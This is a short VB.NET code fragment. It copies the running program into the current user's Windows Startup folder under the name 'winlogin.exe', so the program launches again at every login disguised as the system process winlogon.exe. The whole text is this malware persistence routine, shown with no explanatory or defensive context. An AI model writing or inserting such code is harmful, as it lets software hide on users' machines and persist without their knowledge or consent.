
If System.IO.File.Exists("C:\users\" & System.Environment.UserName & _ "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogin.exe") = False Then
FileCopy(System.Windows.Forms.Application.ExecutablePath, "C:\users\" & System.Environment.UserName & _ "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogin.exe")
End If